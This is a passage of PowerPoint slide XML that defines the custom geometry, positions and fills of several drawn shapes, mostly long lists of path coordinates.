                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FB02CA3B-C853-111C-47E2-CB38758E30F7}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2760681" y="3487696"/>
              <a:ext cx="127000" cy="66040"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="127000" h="66039">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="19049"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="126489" y="65531"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="126489" y="4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9" name="object 33">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{46784E55-09A7-5FE4-5561-FC88C94DDAAF}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2887171" y="3483125"/>
              <a:ext cx="297180" cy="67310"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="297180" h="67310">
                  <a:moveTo>
                    <a:pt x="297173" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="51815"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="67055"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="297173" y="12953"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="297173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0" name="object 34">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{18547C3D-82F5-5F79-FBCC-8321EAD9CF4B}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2862787" y="3417593"/>
              <a:ext cx="36830" cy="74930"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="36830" h="74929">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="64769"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="36575" y="74675"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="36575" y="9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3B6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1" name="object 35">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4F152764-3D81-E0B3-F8ED-BE25C5FF8F70}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2625048" y="2878101"/>
              <a:ext cx="36830" cy="593090"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="36830" h="593089">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="577592"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="36575" y="592832"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="36575" y="14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946F07D6-01C8-44F9-19D1-930CFC3EB928}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2652480" y="2775993"/>
              <a:ext cx="669290" cy="691515"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="669289" h="691514">
                  <a:moveTo>
                    <a:pt x="669020" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="117347"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="691129"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="669020" y="573782"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6690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BC380F88-D37D-6DD3-57D4-3B1B23A60D6A}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2648670" y="2771452"/>
              <a:ext cx="676910" cy="700405"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="676910" h="700404">
                  <a:moveTo>
                    <a:pt x="676640" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="118688"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="700207"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="25863" y="695670"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7619" y="695670"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3151" y="691917"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7619" y="691134"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7619" y="125637"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4468" y="125637"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7619" y="121888"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="25842" y="121888"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="669020" y="9074"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="669020" y="4541"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="676640" y="4541"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="676640" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="676910" h="700404">
                  <a:moveTo>
                    <a:pt x="7619" y="691134"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="3151" y="691917"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7619" y="695670"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7619" y="691134"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="676910" h="700404">
                  <a:moveTo>
                    <a:pt x="669020" y="575127"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="7619" y="691134"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7619" y="695670"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="25863" y="695670"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="676640" y="581524"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="676640" y="578323"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="669020" y="578323"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="669020" y="575127"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="676910" h="700404">
                  <a:moveTo>
                    <a:pt x="672170" y="574574"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="669020" y="575127"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="669020" y="578323"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="672170" y="574574"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="676910" h="700404">
                  <a:moveTo>
                    <a:pt x="676640" y="574574"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="672170" y="574574"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="669020" y="578323"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="676640" y="578323"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="676640" y="574574"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="676910" h="700404">
                  <a:moveTo>
                    <a:pt x="676640" y="4541"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="669020" y="4541"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="673491" y="8290"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="669020" y="9074"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="669020" y="575127"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="672170" y="574574"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="676640" y="574574"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="676640" y="4541"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="676910" h="700404">
                  <a:moveTo>
                    <a:pt x="7619" y="121888"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="4468" y="125637"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7619" y="125084"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7619" y="121888"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="676910" h="700404">
                  <a:moveTo>
                    <a:pt x="7619" y="125084"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="4468" y="125637"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7619" y="125637"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7619" y="125084"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="676910" h="700404">
                  <a:moveTo>
                    <a:pt x="25842" y="121888"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="7619" y="121888"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7619" y="125084"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="25842" y="121888"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="676910" h="700404">
                  <a:moveTo>
                    <a:pt x="669020" y="4541"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="669020" y="9074"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="673491" y="8290"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="669020" y="4541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4" name="object 38">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D8328986-36AE-A1C6-1AFD-D01159D89B88}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2721058" y="2838477"/>
              <a:ext cx="546100" cy="558800"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="546100" h="558800">
                  <a:moveTo>
                    <a:pt x="545579" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="96011"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="558542"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="545579" y="462530"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="545579" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="1B3D6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5" name="object 39">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DCA621A9-8EBE-6801-BCFC-15D7C5739C82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91742" y="3368825"/>
              <a:ext cx="141728" cy="122681"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="46" name="object 40">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7E8BA5F2-EF3B-4D6C-D8C5-6FD828313DBD}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2616667" y="2752097"/>
              <a:ext cx="711835" cy="808355"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="711835" h="808354">
                  <a:moveTo>
                    <a:pt x="233166" y="714947"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="137156" y="733235"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="137156" y="763727"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="269873" y="808236"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="361863" y="791659"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="273165" y="791659"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="269020" y="791357"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="271129" y="790977"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="171897" y="757697"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="153920" y="757697"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="148200" y="749750"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="153920" y="749750"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="153920" y="748404"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="147103" y="748404"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="153920" y="740171"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="190331" y="740171"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="249930" y="728819"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="249930" y="721883"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="233166" y="721883"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="233166" y="714947"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="711835" h="808354">
                  <a:moveTo>
                    <a:pt x="271129" y="790977"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="269020" y="791357"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="273165" y="791659"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="271129" y="790977"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="711835" h="808354">
                  <a:moveTo>
                    <a:pt x="562343" y="738498"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="271129" y="790977"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="273165" y="791659"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="361863" y="791659"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="579106" y="752511"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="579106" y="745505"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="562343" y="745505"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="562343" y="738498"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="711835" h="808354">
                  <a:moveTo>
                    <a:pt x="148200" y="749750"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="153920" y="757697"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="153920" y="751668"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="148200" y="749750"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="711835" h="808354">
                  <a:moveTo>
                    <a:pt x="153920" y="751668"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="153920" y="757697"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="171897" y="757697"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="153920" y="751668"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="711835" h="808354">
                  <a:moveTo>
                    <a:pt x="153920" y="749750"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="148200" y="749750"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="153920" y="751668"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="153920" y="749750"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="711835" h="808354">
                  <a:moveTo>
                    <a:pt x="153920" y="740171"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="147103" y="748404"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="153920" y="747106"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="153920" y="740171"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="711835" h="808354">
                  <a:moveTo>
                    <a:pt x="153920" y="747106"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="147103" y="748404"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="153920" y="748404"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="153920" y="747106"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="711835" h="808354">
                  <a:moveTo>
                    <a:pt x="190331" y="740171"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="153920" y="740171"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="153920" y="747106"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="190331" y="740171"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="711835" h="808354">
                  <a:moveTo>
                    <a:pt x="569241" y="737255"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="562343" y="738498"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="562343" y="745505"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="569241" y="737255"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="711835" h="808354">
                  <a:moveTo>
                    <a:pt x="579106" y="737255"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="569241" y="737255"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="562343" y="745505"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="579106" y="745505"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="579106" y="737255"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="711835" h="808354">
                  <a:moveTo>
                    <a:pt x="562343" y="735513"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="562343" y="738498"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="567973" y="737483"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="562343" y="735513"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="711835" h="808354">
                  <a:moveTo>
                    <a:pt x="562343" y="729503"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="562343" y="735513"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="567973" y="737483"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="562343" y="729503"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="711835" h="808354">
                  <a:moveTo>
                    <a:pt x="579106" y="729503"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="562343" y="729503"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="567973" y="737483"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="569241" y="737255"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="579106" y="737255"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="579106" y="729503"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="711835" h="808354">
                  <a:moveTo>
                    <a:pt x="492302" y="693222"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="441472" y="693222"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="446135" y="693466"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="443759" y="694021"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="562343" y="735513"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="562343" y="729503"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="579106" y="729503"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="579106" y="723552"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="492302" y="693222"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="711835" h="808354">
                  <a:moveTo>
                    <a:pt x="676732" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="118962"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="711758"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="33716" y="729098"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="127086" y="712905"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="38884" y="712905"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="33618" y="712100"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="36386" y="711620"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="26712" y="706643"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="16763" y="706643"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12215" y="699186"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="16763" y="699186"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="16763" y="134263"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9833" y="134263"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="16763" y="126003"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="56817" y="126003"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="675030" y="17320"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="672840" y="16469"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="711691" y="16469"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="711691" y="13593"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="676732" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="711835" h="808354">
                  <a:moveTo>
                    <a:pt x="239983" y="713648"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="233166" y="714947"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="233166" y="721883"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="239983" y="713648"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="711835" h="808354">
                  <a:moveTo>
                    <a:pt x="249930" y="713648"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="239983" y="713648"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="233166" y="721883"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="249930" y="721883"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="249930" y="713648"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="711835" h="808354">
                  <a:moveTo>
                    <a:pt x="249930" y="684545"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="233166" y="684545"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="242981" y="692805"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="233166" y="694507"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="233166" y="714947"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="239983" y="713648"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="249930" y="713648"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="249930" y="684545"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="711835" h="808354">
                  <a:moveTo>
                    <a:pt x="36386" y="711620"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="33618" y="712100"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="38884" y="712905"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="36386" y="711620"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="711835" h="808354">
                  <a:moveTo>
                    <a:pt x="249930" y="674589"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="36386" y="711620"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="38884" y="712905"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="127086" y="712905"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="233166" y="694507"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="233166" y="684545"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="249930" y="684545"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="249930" y="674589"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="711835" h="808354">
                  <a:moveTo>
                    <a:pt x="12215" y="699186"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="16763" y="706643"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="16763" y="701525"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12215" y="699186"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="711835" h="808354">
                  <a:moveTo>
                    <a:pt x="16763" y="701525"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="16763" y="706643"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="26712" y="706643"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="16763" y="701525"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="711835" h="808354">
                  <a:moveTo>
                    <a:pt x="16763" y="699186"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="12215" y="699186"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="16763" y="701525"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="16763" y="699186"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="711835" h="808354">
                  <a:moveTo>
                    <a:pt x="694928" y="594470"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="412994" y="644759"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="412994" y="701208"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="443759" y="694021"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="441472" y="693222"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="492302" y="693222"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="484917" y="690641"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="429758" y="690641"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="419476" y="682483"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="429758" y="680081"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="429758" y="660029"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="422849" y="660029"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="429758" y="651779"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="469100" y="651779"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="711691" y="608508"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="711691" y="601488"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="694928" y="601488"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="694928" y="594470"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="711835" h="808354">
                  <a:moveTo>
                    <a:pt x="233166" y="684545"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="233166" y="694507"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="242981" y="692805"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="233166" y="684545"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="711835" h="808354">
